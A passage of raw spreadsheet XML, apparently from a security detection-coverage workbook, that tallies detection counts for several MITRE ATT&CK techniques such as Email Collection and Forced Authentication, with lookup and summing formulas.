      <c r="BF27" s="12">
        <v>1</v>
      </c>
      <c r="BG27" s="13">
        <v>1</v>
      </c>
      <c r="BH27" s="394">
        <v>1</v>
      </c>
      <c r="BI27" s="292">
        <v>0</v>
      </c>
      <c r="BJ27" s="322">
        <v>0</v>
      </c>
      <c r="BK27" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL27" s="12">
        <v>0</v>
      </c>
      <c r="BM27" s="13">
        <v>0</v>
      </c>
      <c r="BN27" s="394">
        <v>0</v>
      </c>
      <c r="BO27" s="292">
        <v>9</v>
      </c>
      <c r="BP27" s="322">
        <v>9</v>
      </c>
      <c r="BQ27" s="322" t="str">
        <f t="shared" si="10"/>
        <v>9 (9)</v>
      </c>
      <c r="BR27" s="12">
        <v>0</v>
      </c>
      <c r="BS27" s="12">
        <v>5</v>
      </c>
      <c r="BT27" s="13">
        <v>1</v>
      </c>
      <c r="BU27" s="394">
        <v>8</v>
      </c>
      <c r="BV27" s="292">
        <v>0</v>
      </c>
      <c r="BW27" s="322">
        <v>0</v>
      </c>
      <c r="BX27" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY27" s="12">
        <v>0</v>
      </c>
      <c r="BZ27" s="13">
        <v>0</v>
      </c>
      <c r="CA27" s="394">
        <v>0</v>
      </c>
      <c r="CB27" s="292">
        <v>5</v>
      </c>
      <c r="CC27" s="322">
        <v>1</v>
      </c>
      <c r="CD27" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (5)</v>
      </c>
      <c r="CE27" s="12">
        <v>0</v>
      </c>
      <c r="CF27" s="12">
        <v>1</v>
      </c>
      <c r="CG27" s="13">
        <v>1</v>
      </c>
      <c r="CH27" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:86" ht="15" customHeight="1">
      <c r="A28" s="4">
        <f t="shared" si="13"/>
        <v>26</v>
      </c>
      <c r="B28" s="4" t="str">
        <f>IFERROR(VLOOKUP(A28,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1114</v>
      </c>
      <c r="C28" s="493" t="str">
        <f>IFERROR(VLOOKUP(B28,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Email Collection</v>
      </c>
      <c r="D28" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B28)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E28" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F28" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (10)</v>
      </c>
      <c r="G28" s="292">
        <v>7</v>
      </c>
      <c r="H28" s="322">
        <v>5</v>
      </c>
      <c r="I28" s="322" t="str">
        <f t="shared" si="0"/>
        <v>5 (7)</v>
      </c>
      <c r="J28" s="12">
        <v>2</v>
      </c>
      <c r="K28" s="13">
        <v>1</v>
      </c>
      <c r="L28" s="394">
        <v>5</v>
      </c>
      <c r="M28" s="322">
        <v>19</v>
      </c>
      <c r="N28" s="322">
        <v>4</v>
      </c>
      <c r="O28" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (19)</v>
      </c>
      <c r="P28" s="12">
        <v>1</v>
      </c>
      <c r="Q28" s="13">
        <v>1</v>
      </c>
      <c r="R28" s="394">
        <v>4</v>
      </c>
      <c r="S28" s="292">
        <v>26</v>
      </c>
      <c r="T28" s="322">
        <v>9</v>
      </c>
      <c r="U28" s="322" t="str">
        <f t="shared" si="2"/>
        <v>9 (26)</v>
      </c>
      <c r="V28" s="12">
        <v>3</v>
      </c>
      <c r="W28" s="13">
        <v>1</v>
      </c>
      <c r="X28" s="394">
        <v>5</v>
      </c>
      <c r="Y28" s="392">
        <v>16</v>
      </c>
      <c r="Z28" s="392">
        <v>14</v>
      </c>
      <c r="AA28" s="322" t="str">
        <f t="shared" si="3"/>
        <v>14 (16)</v>
      </c>
      <c r="AB28" s="392">
        <v>6</v>
      </c>
      <c r="AC28" s="16">
        <v>1</v>
      </c>
      <c r="AD28" s="394">
        <v>9</v>
      </c>
      <c r="AE28" s="392">
        <v>26</v>
      </c>
      <c r="AF28" s="392">
        <v>9</v>
      </c>
      <c r="AG28" s="322" t="str">
        <f t="shared" si="4"/>
        <v>9 (26)</v>
      </c>
      <c r="AH28" s="392">
        <v>4</v>
      </c>
      <c r="AI28" s="16">
        <v>1</v>
      </c>
      <c r="AJ28" s="394">
        <v>6</v>
      </c>
      <c r="AK28" s="392">
        <v>42</v>
      </c>
      <c r="AL28" s="392">
        <v>23</v>
      </c>
      <c r="AM28" s="322" t="str">
        <f t="shared" si="5"/>
        <v>23 (42)</v>
      </c>
      <c r="AN28" s="392">
        <v>10</v>
      </c>
      <c r="AO28" s="16">
        <v>1</v>
      </c>
      <c r="AP28" s="394">
        <v>9</v>
      </c>
      <c r="AQ28" s="292">
        <v>0</v>
      </c>
      <c r="AR28" s="322">
        <v>0</v>
      </c>
      <c r="AS28" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT28" s="12">
        <v>0</v>
      </c>
      <c r="AU28" s="13">
        <v>0</v>
      </c>
      <c r="AV28" s="394">
        <v>0</v>
      </c>
      <c r="AW28" s="392">
        <v>0</v>
      </c>
      <c r="AX28" s="392">
        <v>0</v>
      </c>
      <c r="AY28" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ28" s="4">
        <v>0</v>
      </c>
      <c r="BA28" s="16">
        <v>0</v>
      </c>
      <c r="BB28" s="394">
        <v>0</v>
      </c>
      <c r="BC28" s="292">
        <v>26</v>
      </c>
      <c r="BD28" s="322">
        <v>9</v>
      </c>
      <c r="BE28" s="322" t="str">
        <f t="shared" si="8"/>
        <v>9 (26)</v>
      </c>
      <c r="BF28" s="12">
        <v>3</v>
      </c>
      <c r="BG28" s="13">
        <v>1</v>
      </c>
      <c r="BH28" s="394">
        <v>5</v>
      </c>
      <c r="BI28" s="292">
        <v>0</v>
      </c>
      <c r="BJ28" s="322">
        <v>0</v>
      </c>
      <c r="BK28" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL28" s="12">
        <v>0</v>
      </c>
      <c r="BM28" s="13">
        <v>0</v>
      </c>
      <c r="BN28" s="394">
        <v>0</v>
      </c>
      <c r="BO28" s="292">
        <v>7</v>
      </c>
      <c r="BP28" s="322">
        <v>7</v>
      </c>
      <c r="BQ28" s="322" t="str">
        <f t="shared" si="10"/>
        <v>7 (7)</v>
      </c>
      <c r="BR28" s="12">
        <v>0</v>
      </c>
      <c r="BS28" s="12">
        <v>4</v>
      </c>
      <c r="BT28" s="13">
        <v>1</v>
      </c>
      <c r="BU28" s="394">
        <v>6</v>
      </c>
      <c r="BV28" s="292">
        <v>0</v>
      </c>
      <c r="BW28" s="322">
        <v>0</v>
      </c>
      <c r="BX28" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY28" s="12">
        <v>0</v>
      </c>
      <c r="BZ28" s="13">
        <v>0</v>
      </c>
      <c r="CA28" s="394">
        <v>0</v>
      </c>
      <c r="CB28" s="292">
        <v>3</v>
      </c>
      <c r="CC28" s="322">
        <v>3</v>
      </c>
      <c r="CD28" s="322" t="str">
        <f t="shared" si="12"/>
        <v>3 (3)</v>
      </c>
      <c r="CE28" s="12">
        <v>0</v>
      </c>
      <c r="CF28" s="12">
        <v>2</v>
      </c>
      <c r="CG28" s="13">
        <v>1</v>
      </c>
      <c r="CH28" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="29" spans="1:86" ht="15" customHeight="1">
      <c r="A29" s="4">
        <f t="shared" si="13"/>
        <v>27</v>
      </c>
      <c r="B29" s="4" t="str">
        <f>IFERROR(VLOOKUP(A29,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1132</v>
      </c>
      <c r="C29" s="493" t="str">
        <f>IFERROR(VLOOKUP(B29,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Encoding</v>
      </c>
      <c r="D29" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B29)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E29" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F29" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (10)</v>
      </c>
      <c r="G29" s="292">
        <v>1</v>
      </c>
      <c r="H29" s="322">
        <v>1</v>
      </c>
      <c r="I29" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J29" s="12">
        <v>1</v>
      </c>
      <c r="K29" s="13">
        <v>1</v>
      </c>
      <c r="L29" s="394">
        <v>1</v>
      </c>
      <c r="M29" s="322">
        <v>11</v>
      </c>
      <c r="N29" s="322">
        <v>11</v>
      </c>
      <c r="O29" s="322" t="str">
        <f t="shared" si="1"/>
        <v>11 (11)</v>
      </c>
      <c r="P29" s="12">
        <v>3</v>
      </c>
      <c r="Q29" s="13">
        <v>1</v>
      </c>
      <c r="R29" s="394">
        <v>6</v>
      </c>
      <c r="S29" s="292">
        <v>12</v>
      </c>
      <c r="T29" s="322">
        <v>12</v>
      </c>
      <c r="U29" s="322" t="str">
        <f t="shared" si="2"/>
        <v>12 (12)</v>
      </c>
      <c r="V29" s="12">
        <v>4</v>
      </c>
      <c r="W29" s="13">
        <v>1</v>
      </c>
      <c r="X29" s="394">
        <v>6</v>
      </c>
      <c r="Y29" s="392">
        <v>6</v>
      </c>
      <c r="Z29" s="392">
        <v>6</v>
      </c>
      <c r="AA29" s="322" t="str">
        <f t="shared" si="3"/>
        <v>6 (6)</v>
      </c>
      <c r="AB29" s="392">
        <v>2</v>
      </c>
      <c r="AC29" s="16">
        <v>1</v>
      </c>
      <c r="AD29" s="394">
        <v>6</v>
      </c>
      <c r="AE29" s="392">
        <v>20</v>
      </c>
      <c r="AF29" s="392">
        <v>18</v>
      </c>
      <c r="AG29" s="322" t="str">
        <f t="shared" si="4"/>
        <v>18 (20)</v>
      </c>
      <c r="AH29" s="392">
        <v>6</v>
      </c>
      <c r="AI29" s="16">
        <v>1</v>
      </c>
      <c r="AJ29" s="394">
        <v>6</v>
      </c>
      <c r="AK29" s="392">
        <v>26</v>
      </c>
      <c r="AL29" s="392">
        <v>24</v>
      </c>
      <c r="AM29" s="322" t="str">
        <f t="shared" si="5"/>
        <v>24 (26)</v>
      </c>
      <c r="AN29" s="392">
        <v>8</v>
      </c>
      <c r="AO29" s="16">
        <v>1</v>
      </c>
      <c r="AP29" s="394">
        <v>6</v>
      </c>
      <c r="AQ29" s="292">
        <v>0</v>
      </c>
      <c r="AR29" s="322">
        <v>0</v>
      </c>
      <c r="AS29" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT29" s="12">
        <v>0</v>
      </c>
      <c r="AU29" s="13">
        <v>0</v>
      </c>
      <c r="AV29" s="394">
        <v>0</v>
      </c>
      <c r="AW29" s="392">
        <v>0</v>
      </c>
      <c r="AX29" s="392">
        <v>0</v>
      </c>
      <c r="AY29" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ29" s="4">
        <v>0</v>
      </c>
      <c r="BA29" s="16">
        <v>0</v>
      </c>
      <c r="BB29" s="394">
        <v>0</v>
      </c>
      <c r="BC29" s="292">
        <v>12</v>
      </c>
      <c r="BD29" s="322">
        <v>12</v>
      </c>
      <c r="BE29" s="322" t="str">
        <f t="shared" si="8"/>
        <v>12 (12)</v>
      </c>
      <c r="BF29" s="12">
        <v>4</v>
      </c>
      <c r="BG29" s="13">
        <v>1</v>
      </c>
      <c r="BH29" s="394">
        <v>6</v>
      </c>
      <c r="BI29" s="292">
        <v>2</v>
      </c>
      <c r="BJ29" s="322">
        <v>2</v>
      </c>
      <c r="BK29" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (2)</v>
      </c>
      <c r="BL29" s="12">
        <v>2</v>
      </c>
      <c r="BM29" s="13">
        <v>1</v>
      </c>
      <c r="BN29" s="394">
        <v>1</v>
      </c>
      <c r="BO29" s="292">
        <v>10</v>
      </c>
      <c r="BP29" s="322">
        <v>10</v>
      </c>
      <c r="BQ29" s="322" t="str">
        <f t="shared" si="10"/>
        <v>10 (10)</v>
      </c>
      <c r="BR29" s="12">
        <v>2</v>
      </c>
      <c r="BS29" s="12">
        <v>3</v>
      </c>
      <c r="BT29" s="13">
        <v>1</v>
      </c>
      <c r="BU29" s="394">
        <v>9</v>
      </c>
      <c r="BV29" s="292">
        <v>0</v>
      </c>
      <c r="BW29" s="322">
        <v>0</v>
      </c>
      <c r="BX29" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY29" s="12">
        <v>0</v>
      </c>
      <c r="BZ29" s="13">
        <v>0</v>
      </c>
      <c r="CA29" s="394">
        <v>0</v>
      </c>
      <c r="CB29" s="292">
        <v>5</v>
      </c>
      <c r="CC29" s="322">
        <v>5</v>
      </c>
      <c r="CD29" s="322" t="str">
        <f t="shared" si="12"/>
        <v>5 (5)</v>
      </c>
      <c r="CE29" s="12">
        <v>0</v>
      </c>
      <c r="CF29" s="12">
        <v>1</v>
      </c>
      <c r="CG29" s="13">
        <v>1</v>
      </c>
      <c r="CH29" s="394">
        <v>5</v>
      </c>
    </row>
    <row r="30" spans="1:86" ht="15" customHeight="1">
      <c r="A30" s="4">
        <f t="shared" si="13"/>
        <v>28</v>
      </c>
      <c r="B30" s="4" t="str">
        <f>IFERROR(VLOOKUP(A30,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1133</v>
      </c>
      <c r="C30" s="493" t="str">
        <f>IFERROR(VLOOKUP(B30,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>External Remote Services</v>
      </c>
      <c r="D30" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B30)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E30" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>32</v>
      </c>
      <c r="F30" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (32)</v>
      </c>
      <c r="G30" s="292">
        <v>0</v>
      </c>
      <c r="H30" s="322">
        <v>0</v>
      </c>
      <c r="I30" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J30" s="12">
        <v>0</v>
      </c>
      <c r="K30" s="13">
        <v>0</v>
      </c>
      <c r="L30" s="394">
        <v>0</v>
      </c>
      <c r="M30" s="322">
        <v>0</v>
      </c>
      <c r="N30" s="322">
        <v>0</v>
      </c>
      <c r="O30" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P30" s="12">
        <v>0</v>
      </c>
      <c r="Q30" s="13">
        <v>0</v>
      </c>
      <c r="R30" s="394">
        <v>0</v>
      </c>
      <c r="S30" s="292">
        <v>0</v>
      </c>
      <c r="T30" s="322">
        <v>0</v>
      </c>
      <c r="U30" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V30" s="12">
        <v>0</v>
      </c>
      <c r="W30" s="13">
        <v>0</v>
      </c>
      <c r="X30" s="394">
        <v>0</v>
      </c>
      <c r="Y30" s="392">
        <v>1</v>
      </c>
      <c r="Z30" s="392">
        <v>1</v>
      </c>
      <c r="AA30" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB30" s="392">
        <v>1</v>
      </c>
      <c r="AC30" s="16">
        <v>1</v>
      </c>
      <c r="AD30" s="394">
        <v>1</v>
      </c>
      <c r="AE30" s="392">
        <v>4</v>
      </c>
      <c r="AF30" s="392">
        <v>3</v>
      </c>
      <c r="AG30" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (4)</v>
      </c>
      <c r="AH30" s="392">
        <v>2</v>
      </c>
      <c r="AI30" s="16">
        <v>1</v>
      </c>
      <c r="AJ30" s="394">
        <v>3</v>
      </c>
      <c r="AK30" s="392">
        <v>5</v>
      </c>
      <c r="AL30" s="392">
        <v>4</v>
      </c>
      <c r="AM30" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (5)</v>
      </c>
      <c r="AN30" s="392">
        <v>3</v>
      </c>
      <c r="AO30" s="16">
        <v>1</v>
      </c>
      <c r="AP30" s="394">
        <v>4</v>
      </c>
      <c r="AQ30" s="292">
        <v>0</v>
      </c>
      <c r="AR30" s="322">
        <v>0</v>
      </c>
      <c r="AS30" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT30" s="12">
        <v>0</v>
      </c>
      <c r="AU30" s="13">
        <v>0</v>
      </c>
      <c r="AV30" s="394">
        <v>0</v>
      </c>
      <c r="AW30" s="392">
        <v>1</v>
      </c>
      <c r="AX30" s="392">
        <v>1</v>
      </c>
      <c r="AY30" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ30" s="4">
        <v>1</v>
      </c>
      <c r="BA30" s="16">
        <v>1</v>
      </c>
      <c r="BB30" s="394">
        <v>1</v>
      </c>
      <c r="BC30" s="292">
        <v>1</v>
      </c>
      <c r="BD30" s="322">
        <v>1</v>
      </c>
      <c r="BE30" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
      <c r="BF30" s="12">
        <v>1</v>
      </c>
      <c r="BG30" s="13">
        <v>1</v>
      </c>
      <c r="BH30" s="394">
        <v>1</v>
      </c>
      <c r="BI30" s="292">
        <v>0</v>
      </c>
      <c r="BJ30" s="322">
        <v>0</v>
      </c>
      <c r="BK30" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL30" s="12">
        <v>0</v>
      </c>
      <c r="BM30" s="13">
        <v>0</v>
      </c>
      <c r="BN30" s="394">
        <v>0</v>
      </c>
      <c r="BO30" s="292">
        <v>32</v>
      </c>
      <c r="BP30" s="322">
        <v>30</v>
      </c>
      <c r="BQ30" s="322" t="str">
        <f t="shared" si="10"/>
        <v>30 (32)</v>
      </c>
      <c r="BR30" s="12">
        <v>0</v>
      </c>
      <c r="BS30" s="12">
        <v>7</v>
      </c>
      <c r="BT30" s="13">
        <v>1</v>
      </c>
      <c r="BU30" s="394">
        <v>30</v>
      </c>
      <c r="BV30" s="292">
        <v>0</v>
      </c>
      <c r="BW30" s="322">
        <v>0</v>
      </c>
      <c r="BX30" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY30" s="12">
        <v>0</v>
      </c>
      <c r="BZ30" s="13">
        <v>0</v>
      </c>
      <c r="CA30" s="394">
        <v>0</v>
      </c>
      <c r="CB30" s="292">
        <v>0</v>
      </c>
      <c r="CC30" s="322">
        <v>0</v>
      </c>
      <c r="CD30" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE30" s="12">
        <v>0</v>
      </c>
      <c r="CF30" s="12">
        <v>0</v>
      </c>
      <c r="CG30" s="13">
        <v>0</v>
      </c>
      <c r="CH30" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:86" ht="15" customHeight="1">
      <c r="A31" s="4">
        <f t="shared" si="13"/>
        <v>29</v>
      </c>
      <c r="B31" s="4" t="str">
        <f>IFERROR(VLOOKUP(A31,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1176</v>
      </c>
      <c r="C31" s="493" t="str">
        <f>IFERROR(VLOOKUP(B31,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Software Extensions</v>
      </c>
      <c r="D31" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B31)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E31" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>217</v>
      </c>
      <c r="F31" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (217)</v>
      </c>
      <c r="G31" s="292">
        <v>0</v>
      </c>
      <c r="H31" s="322">
        <v>0</v>
      </c>
      <c r="I31" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J31" s="12">
        <v>0</v>
      </c>
      <c r="K31" s="13">
        <v>0</v>
      </c>
      <c r="L31" s="394">
        <v>0</v>
      </c>
      <c r="M31" s="322">
        <v>0</v>
      </c>
      <c r="N31" s="322">
        <v>0</v>
      </c>
      <c r="O31" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P31" s="12">
        <v>0</v>
      </c>
      <c r="Q31" s="13">
        <v>0</v>
      </c>
      <c r="R31" s="394">
        <v>0</v>
      </c>
      <c r="S31" s="292">
        <v>0</v>
      </c>
      <c r="T31" s="322">
        <v>0</v>
      </c>
      <c r="U31" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V31" s="12">
        <v>0</v>
      </c>
      <c r="W31" s="13">
        <v>0</v>
      </c>
      <c r="X31" s="394">
        <v>0</v>
      </c>
      <c r="Y31" s="392">
        <v>212</v>
      </c>
      <c r="Z31" s="392">
        <v>212</v>
      </c>
      <c r="AA31" s="322" t="str">
        <f t="shared" si="3"/>
        <v>212 (212)</v>
      </c>
      <c r="AB31" s="392">
        <v>1</v>
      </c>
      <c r="AC31" s="16">
        <v>1</v>
      </c>
      <c r="AD31" s="394">
        <v>212</v>
      </c>
      <c r="AE31" s="392">
        <v>216</v>
      </c>
      <c r="AF31" s="392">
        <v>214</v>
      </c>
      <c r="AG31" s="322" t="str">
        <f t="shared" si="4"/>
        <v>214 (216)</v>
      </c>
      <c r="AH31" s="392">
        <v>3</v>
      </c>
      <c r="AI31" s="16">
        <v>1</v>
      </c>
      <c r="AJ31" s="394">
        <v>212</v>
      </c>
      <c r="AK31" s="392">
        <v>428</v>
      </c>
      <c r="AL31" s="392">
        <v>426</v>
      </c>
      <c r="AM31" s="322" t="str">
        <f t="shared" si="5"/>
        <v>426 (428)</v>
      </c>
      <c r="AN31" s="392">
        <v>4</v>
      </c>
      <c r="AO31" s="16">
        <v>1</v>
      </c>
      <c r="AP31" s="394">
        <v>212</v>
      </c>
      <c r="AQ31" s="292">
        <v>0</v>
      </c>
      <c r="AR31" s="322">
        <v>0</v>
      </c>
      <c r="AS31" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT31" s="12">
        <v>0</v>
      </c>
      <c r="AU31" s="13">
        <v>0</v>
      </c>
      <c r="AV31" s="394">
        <v>0</v>
      </c>
      <c r="AW31" s="392">
        <v>0</v>
      </c>
      <c r="AX31" s="392">
        <v>0</v>
      </c>
      <c r="AY31" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ31" s="4">
        <v>0</v>
      </c>
      <c r="BA31" s="16">
        <v>0</v>
      </c>
      <c r="BB31" s="394">
        <v>0</v>
      </c>
      <c r="BC31" s="292">
        <v>0</v>
      </c>
      <c r="BD31" s="322">
        <v>0</v>
      </c>
      <c r="BE31" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF31" s="12">
        <v>0</v>
      </c>
      <c r="BG31" s="13">
        <v>0</v>
      </c>
      <c r="BH31" s="394">
        <v>0</v>
      </c>
      <c r="BI31" s="292">
        <v>0</v>
      </c>
      <c r="BJ31" s="322">
        <v>0</v>
      </c>
      <c r="BK31" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL31" s="12">
        <v>0</v>
      </c>
      <c r="BM31" s="13">
        <v>0</v>
      </c>
      <c r="BN31" s="394">
        <v>0</v>
      </c>
      <c r="BO31" s="292">
        <v>429</v>
      </c>
      <c r="BP31" s="322">
        <v>429</v>
      </c>
      <c r="BQ31" s="322" t="str">
        <f t="shared" si="10"/>
        <v>429 (429)</v>
      </c>
      <c r="BR31" s="12">
        <v>0</v>
      </c>
      <c r="BS31" s="12">
        <v>4</v>
      </c>
      <c r="BT31" s="13">
        <v>1</v>
      </c>
      <c r="BU31" s="394">
        <v>217</v>
      </c>
      <c r="BV31" s="292">
        <v>0</v>
      </c>
      <c r="BW31" s="322">
        <v>0</v>
      </c>
      <c r="BX31" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY31" s="12">
        <v>0</v>
      </c>
      <c r="BZ31" s="13">
        <v>0</v>
      </c>
      <c r="CA31" s="394">
        <v>0</v>
      </c>
      <c r="CB31" s="292">
        <v>212</v>
      </c>
      <c r="CC31" s="322">
        <v>212</v>
      </c>
      <c r="CD31" s="322" t="str">
        <f t="shared" si="12"/>
        <v>212 (212)</v>
      </c>
      <c r="CE31" s="12">
        <v>0</v>
      </c>
      <c r="CF31" s="12">
        <v>1</v>
      </c>
      <c r="CG31" s="13">
        <v>1</v>
      </c>
      <c r="CH31" s="394">
        <v>212</v>
      </c>
    </row>
    <row r="32" spans="1:86" ht="15" customHeight="1">
      <c r="A32" s="4">
        <f t="shared" si="13"/>
        <v>30</v>
      </c>
      <c r="B32" s="4" t="str">
        <f>IFERROR(VLOOKUP(A32,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1187</v>
      </c>
      <c r="C32" s="493" t="str">
        <f>IFERROR(VLOOKUP(B32,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Forced Authentication</v>
      </c>
      <c r="D32" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B32)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E32" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>11</v>
      </c>
      <c r="F32" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (11)</v>
      </c>
      <c r="G32" s="292">
        <v>0</v>
      </c>
      <c r="H32" s="322">
        <v>0</v>
      </c>
      <c r="I32" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J32" s="12">
        <v>0</v>
      </c>
      <c r="K32" s="13">
        <v>0</v>
      </c>
      <c r="L32" s="394">
        <v>0</v>
      </c>
      <c r="M32" s="322">
        <v>0</v>
      </c>
      <c r="N32" s="322">
        <v>0</v>
      </c>
      <c r="O32" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P32" s="12">
        <v>0</v>
      </c>
      <c r="Q32" s="13">
        <v>0</v>
      </c>
      <c r="R32" s="394">
        <v>0</v>
      </c>
      <c r="S32" s="292">
        <v>0</v>
      </c>
      <c r="T32" s="322">
        <v>0</v>
      </c>
      <c r="U32" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V32" s="12">
        <v>0</v>
      </c>
      <c r="W32" s="13">
        <v>0</v>
      </c>
      <c r="X32" s="394">
        <v>0</v>
      </c>
      <c r="Y32" s="392">
        <v>15</v>
      </c>
      <c r="Z32" s="392">
        <v>15</v>
      </c>
      <c r="AA32" s="322" t="str">
        <f t="shared" si="3"/>
        <v>15 (15)</v>
      </c>
      <c r="AB32" s="392">
        <v>5</v>
      </c>
      <c r="AC32" s="16">
        <v>1</v>
      </c>
      <c r="AD32" s="394">
        <v>3</v>
      </c>
      <c r="AE32" s="392">
        <v>8</v>
      </c>
      <c r="AF32" s="392">
        <v>6</v>
      </c>
      <c r="AG32" s="322" t="str">
        <f t="shared" si="4"/>
        <v>6 (8)</v>
      </c>
      <c r="AH32" s="392">
        <v>2</v>
      </c>
      <c r="AI32" s="16">
        <v>1</v>
      </c>
      <c r="AJ32" s="394">
        <v>3</v>
      </c>
      <c r="AK32" s="392">
        <v>23</v>
      </c>
      <c r="AL32" s="392">
        <v>21</v>
      </c>
      <c r="AM32" s="322" t="str">
        <f t="shared" si="5"/>
        <v>21 (23)</v>
      </c>
      <c r="AN32" s="392">
        <v>7</v>
      </c>
      <c r="AO32" s="16">
        <v>1</v>
      </c>
      <c r="AP32" s="394">
        <v>5</v>
      </c>
      <c r="AQ32" s="292">
        <v>0</v>
      </c>
      <c r="AR32" s="322">
        <v>0</v>
      </c>
      <c r="AS32" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
